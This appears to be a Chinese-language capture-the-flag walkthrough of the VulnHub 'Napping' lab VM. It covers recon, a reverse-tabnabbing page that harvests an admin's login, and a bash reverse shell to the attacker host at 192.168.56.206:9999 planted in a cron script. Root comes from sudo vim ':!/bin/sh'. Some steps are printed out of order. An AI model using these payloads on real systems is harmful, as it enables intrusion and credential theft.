Napping
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.101.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:75:2d:c2 1 60 PCS Systemtechnik GmbH
192.168.56.130 08:00:27:49:ee:4d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.130
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.130 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 21:08 EST
Nmap scan report for 192.168.56.130
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24c4fcdc4bf431a0ad0d2061fdcaab79 (RSA)
| 256 6f31b3e77baa22a2a780ef6dd2876cbe (ECDSA)
|_ 256 af0185cfdd43e98d325083b241ec1d3b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.77 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
在Kali Linux启动http服务,编写一个恶意脚本和一个普通脚本:
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ cat malicious.html
<!DOCTYPE html>
<html>
<body>
<script>
if(windows.opener) windows.opener.parent.location.replace('http://192.168.56.206:8000/good.html');
</script>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ cat good.html
<html>
<body>
Jason, great
</body>
</html>
在目标主机提交链接: http://192.168.56.206/malicious.html
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.130 - - [24/Dec/2022 21:22:02] "GET /malicious.html HTTP/1.1" 200 -
在Kali Linux上得到管理员的用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nc -nlvp 8000
[sudo] password for kali:
listening on [any] 8000 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.130] 36868
POST /good.html HTTP/1.1
Host: 192.168.56.206:8000
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
username=daniel&password=C%40ughtm3napping123
注意上述密码是URL编码过的,因此%40需要替换为@
登录daniel的ssh:
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-89-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 25 02:24:47 UTC 2022
System load: 0.32 Processes: 138
Usage of /: 41.2% of 18.57GB Users logged in: 0
Memory usage: 16% IPv4 address for enp0s3: 192.168.56.130
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
33 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Oct 12 00:51:35 2021 from 10.0.2.15
daniel@napping:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel),1002(administrators)
daniel@napping:~$ sudo -l
[sudo] password for daniel:
Sorry, user daniel may not run sudo on napping.
daniel@napping:~$ ls -alh
total 24K
drwxr-xr-x 3 daniel daniel 4.0K Oct 12 2021 .
drwxr-xr-x 4 root root 4.0K Oct 12 2021 ..
lrwxrwxrwx 1 daniel daniel 9 Oct 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 daniel daniel 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 daniel daniel 3.7K Feb 25 2020 .bashrc
drwx------ 2 daniel daniel 4.0K Oct 12 2021 .cache
-rw-r--r-- 1 daniel daniel 807 Feb 25 2020 .profile
-rw------- 1 daniel daniel 0 Oct 12 2021 .viminfo
daniel@napping:~$ cd /home
daniel@napping:/home$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Oct 12 2021 .
drwxr-xr-x 20 root root 4.0K Oct 11 2021 ..
drwxr-xr-x 3 adrian adrian 4.0K Dec 25 02:06 adrian
drwxr-xr-x 3 daniel daniel 4.0K Oct 12 2021 daniel
daniel@napping:/home$ cd adrian/
daniel@napping:~$ cat shell.sh
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.56.206/9999 0>&1'
daniel@napping:~$
daniel@napping:~$ nano shell.sh
daniel@napping:~$ cat /home/adrian/query.py
from datetime import datetime
import requests
import os
os.system("/usr/bin/bash /home/daniel/shell.sh")
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Site is Up: ")
f.write(dt_string)
f.write("\n")
f.close()
else:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Check Out Site: ")
f.write(dt_string)
f.write("\n")
f.close()
提权
:!/bin/sh
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 48K
drwx------ 5 root root 4.0K Oct 30 2021 .
drwxr-xr-x 20 root root 4.0K Oct 11 2021 ..
lrwxrwxrwx 1 root root 9 Oct 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 12 2021 .cache
lrwxrwxrwx 1 root root 9 Oct 12 2021 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 75 Oct 19 2021 .selected_editor
drwx------ 2 root root 4.0K Oct 11 2021 .ssh
-rw------- 1 root root 0 Oct 30 2021 .viminfo
-rw-r----- 1 root root 224 Oct 19 2021 del_links.py
-rw-r----- 1 root root 224 Oct 21 2021 del_users.py
-rw-r----- 1 root root 935 Oct 30 2021 nap.py
-rw------- 1 root root 41 Oct 12 2021 root.txt
drwxr-xr-x 3 root root 4.0K Oct 11 2021 snap
cat root.txt
Admins just can't stay awake tsk tsk tsk
┌──(kali㉿kali)-[~/Vulnhub/napping]
└─$ sudo nc -nlvp 9999
[sudo] password for kali:
listening on [any] 9999 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.130] 58366
bash: cannot set terminal process group (1637): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$ id
id
uid=1000(adrian) gid=1000(adrian) groups=1000(adrian),1002(administrators)
adrian@napping:~$ sudo -l
sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
adrian@napping:~$ sudo /usr/bin/vim -c ':!/bin/sh'
sudo /usr/bin/vim -c ':!/bin/sh'
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
E558: Terminal entry not found in terminfo